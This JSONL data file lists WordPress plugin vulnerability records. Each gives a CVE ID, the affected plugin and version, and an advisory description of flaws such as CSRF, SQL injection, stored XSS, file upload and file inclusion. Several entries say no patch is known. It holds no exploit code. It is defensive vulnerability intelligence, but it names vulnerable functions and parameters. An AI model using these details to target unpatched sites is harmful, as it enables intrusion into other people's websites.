{"CVE_ID":"CVE-2023-1343","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the attach_rule function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f74b86-a050-4247-b310-045bf48fd4bd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f74b86-a050-4247-b310-045bf48fd4bd\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0768","slug":"avirato-calendar","versionImpact":"5.0.5","description":"The Avirato hotels online booking engine WordPress plugin through 5.0.5 does not validate and escape some of its shortcode attributes before using them in SQL statement\/s, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03d061b4-1b71-44f5-b3dc-f82a5fcd92eb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03d061b4-1b71-44f5-b3dc-f82a5fcd92eb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15033","slug":"delete-all-comments","versionImpact":"2.0.","description":"The Delete All Comments plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the delete-all-comments.php file in versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e98d2d-20b1-4fff-96d4-0fb8e0d2615a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e98d2d-20b1-4fff-96d4-0fb8e0d2615a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"http:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin\\\/\",\"name\":\"http:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/delete-all-comments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/delete-all-comments\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3510","slug":"ftp-access","versionImpact":"1.0","description":"The FTP Access WordPress plugin through 1.0 does not have authorisation and CSRF checks when updating its settings and is missing sanitisation as well as escaping in them, allowing any authenticated users, such as subscribers, to update them with XSS payloads, which will be triggered when an admin views the settings of the plugin. The attack could also be performed via CSRF against any authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76abf4ac-5cc1-41a0-84c3-dff42c659581\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76abf4ac-5cc1-41a0-84c3-dff42c659581\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5199","slug":"php-to-page","versionImpact":"0.3","description":"The PHP to Page plugin for WordPress is vulnerable to Local File Inclusion leading to Remote Code Execution in versions up to, and including, 0.3 via the 'php-to-page' shortcode. This allows authenticated attackers with subscriber-level permissions or above to include local files and potentially execute code on the server. While subscribers may need to poison log files or otherwise get a file installed in order to achieve remote code execution, author and above users can upload files by default and achieve remote code execution easily.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/php-to-page\\\/trunk\\\/php-to-page.php?rev=441028#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/php-to-page\\\/trunk\\\/php-to-page.php?rev=441028#L22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e5a0dc-fc51-4565-945f-190cf9175874?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e5a0dc-fc51-4565-945f-190cf9175874?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50371","slug":"advanced-page-visit-counter","versionImpact":"8.0.6","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Page Visit Counter Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress allows Stored XSS. This issue affects Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress: from n\/a through 8.0.6.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-8-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-8-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3748","slug":"sp-client-document-manager","versionImpact":"4.71","description":"The SP Project & Document Manager WordPress plugin through 4.71 is missing validation in its upload function, allowing a user to manipulate the `user_id` to make it appear that a file was uploaded by another user","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01427cfb-5c51-4524-9b9d-e09a603bc34c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01427cfb-5c51-4524-9b9d-e09a603bc34c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4870","slug":"frontend-registration-contact-form-7","versionImpact":"5.1","description":"The Frontend Registration \u2013 Contact Form 7 plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1 due to insufficient restriction on the '_cf7frr_' post meta. This makes it possible for authenticated attackers, with editor-level access and above, to modify the default user role in the registration form settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca616ae6-59d3-4037-b538-d371f007a037?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca616ae6-59d3-4037-b538-d371f007a037?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-registration-contact-form-7\\\/trunk\\\/frontend-registration-cf7.php?rev=2975770#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-registration-contact-form-7\\\/trunk\\\/frontend-registration-cf7.php?rev=2975770#L244\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4541","slug":"custom-product-list-table","versionImpact":"3.0.0","description":"The Custom Product List Table plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.0. This is due to missing or incorrect nonce validation when modifying products. This makes it possible for unauthenticated attackers to add, delete, bulk edit, approve or cancel products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c046e0c-32d2-47d1-9890-d05d69217161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c046e0c-32d2-47d1-9890-d05d69217161?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-product-list-table\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-product-list-table\\\/#description\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0619","slug":"payflex-payment-gateway","versionImpact":"2.5.0","description":"The Payflex Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the payment_callback() function in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to update the status of orders, which can potentially lead to revenue loss.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payflex-payment-gateway\\\/trunk\\\/partpay.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payflex-payment-gateway\\\/trunk\\\/partpay.php#L751\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6567","slug":"ebook-store","versionImpact":"5.8001","description":"The Ebook Store plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 5.8001. This is due to the plugin utilizing fpdi-protection and not preventing direct access to test files that have display_errors set to true. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebe431a7-b552-4891-9784-c6a7353228da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebe431a7-b552-4891-9784-c6a7353228da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/fpdi\\\/fpdi-protection-master\\\/local-tests\\\/simple.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/fpdi\\\/fpdi-protection-master\\\/local-tests\\\/simple.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7691","slug":"flaming-forms","versionImpact":"1.0.1","description":"The Flaming Forms WordPress plugin through 1.0.1 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d30a3b95-5d1f-4755-8b61-19946afc51ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d30a3b95-5d1f-4755-8b61-19946afc51ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6626","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.9","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on several functions in all versions up to, and including, 2.9.9.9. This makes it possible for unauthenticated attackers to view form submissions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eccea504-b8b9-46d3-b9fd-ae893528e521?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eccea504-b8b9-46d3-b9fd-ae893528e521?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L20\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10666","slug":"easy-twitter-feeds","versionImpact":"1.2.6","description":"The Easy Twitter Feed \u2013 Twitter feeds plugin for WP plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.6 via the [etf] shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-twitter-feeds\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-twitter-feeds\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cd3168-3261-4e36-8fbe-2058cd821937?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cd3168-3261-4e36-8fbe-2058cd821937?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11928","slug":"ichart","versionImpact":"2.1.0","description":"The iChart \u2013 Easy Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ichart\\\/tags\\\/2.1.0\\\/qcld_ichart_shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ichart\\\/tags\\\/2.1.0\\\/qcld_ichart_shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204817\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204817\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ichart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ichart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/100f6ccd-02d3-4b9e-8dd4-957a518c2a55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/100f6ccd-02d3-4b9e-8dd4-957a518c2a55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12591","slug":"magicpost","versionImpact":"1.2.1","description":"The MagicPost plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wb_share_social shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209000%40magicpost&new=3209000%40magicpost&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209000%40magicpost&new=3209000%40magicpost&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magicpost\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magicpost\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12542","slug":"linkid","versionImpact":"0.1.2","description":"The linkID plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when including the 'phpinfo' function in all versions up to, and including, 0.1.2. This makes it possible for unauthenticated attackers to read configuration settings and predefined variables on the site's server. The plugin does not need to be activated for the vulnerability to be exploited.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkid\\\/trunk\\\/lib\\\/linkid\\\/linkid-sdk-php\\\/util\\\/index.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkid\\\/trunk\\\/lib\\\/linkid\\\/linkid-sdk-php\\\/util\\\/index.php#L1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2fe5315-37b7-4009-b2e5-909e6b5ed1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2fe5315-37b7-4009-b2e5-909e6b5ed1da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13734","slug":"card-elements-for-elementor","versionImpact":"1.2.6","description":"The Card Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Profile Card widget in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244795\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244795\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/card-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/card-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.techeshta.com\\\/docs\\\/card-elements-for-elementor\\\/element-settings\\\/profile-card\\\/\",\"name\":\"https:\\\/\\\/www.techeshta.com\\\/docs\\\/card-elements-for-elementor\\\/element-settings\\\/profile-card\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7134bb24-11a1-41f9-ad34-b4527c22463c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7134bb24-11a1-41f9-ad34-b4527c22463c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0839","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 6.91 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b76f5f-03f7-48bc-b848-9ab55d875639?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b76f5f-03f7-48bc-b848-9ab55d875639?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3853","slug":"wpshop","versionImpact":"2.6.0","description":"The WPshop 2 \u2013 E-Commerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions 2.0.0 to 2.6.0 via the callback_generate_api_key() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create valid API keys on behalf of other users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/modules\\\/api\\\/action\\\/class-api-action.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/modules\\\/api\\\/action\\\/class-api-action.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136d63c4-c985-413f-8d8b-b57e11d1d230?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136d63c4-c985-413f-8d8b-b57e11d1d230?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1342","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the ucss_connect function. This makes it possible for unauthenticated attackers to connect the site to a new license key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c66894a-8d0f-4946-ae4d-bffd35f3ffb7\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c66894a-8d0f-4946-ae4d-bffd35f3ffb7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0603","slug":"sloth-logo-customizer","versionImpact":"2.0.2","description":"The Sloth Logo Customizer WordPress plugin through 2.0.2 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c93ea8f-4e68-4da1-994e-35a5873278ba\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c93ea8f-4e68-4da1-994e-35a5873278ba\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4380","slug":"wp-pinterest-automatic","versionImpact":"1.14.3","description":"The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-pinterest-automatic-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-pinterest-automatic-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffd344fd-de2c-4f27-8932-41aa0a3c3d05\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffd344fd-de2c-4f27-8932-41aa0a3c3d05\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49841","slug":"optin-forms","versionImpact":"1.3.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FancyThemes Optin Forms \u2013 Simple List Building Plugin for WordPress allows Stored XSS. This issue affects Optin Forms \u2013 Simple List Building Plugin for WordPress: from n\/a through 1.3.3.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1779","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_status() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter the message read status of messages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52e4f79f-1148-4530-8d78-377a7365978a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52e4f79f-1148-4530-8d78-377a7365978a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L213\",\"refsource\":\"\",\"tags\":[]}]"}
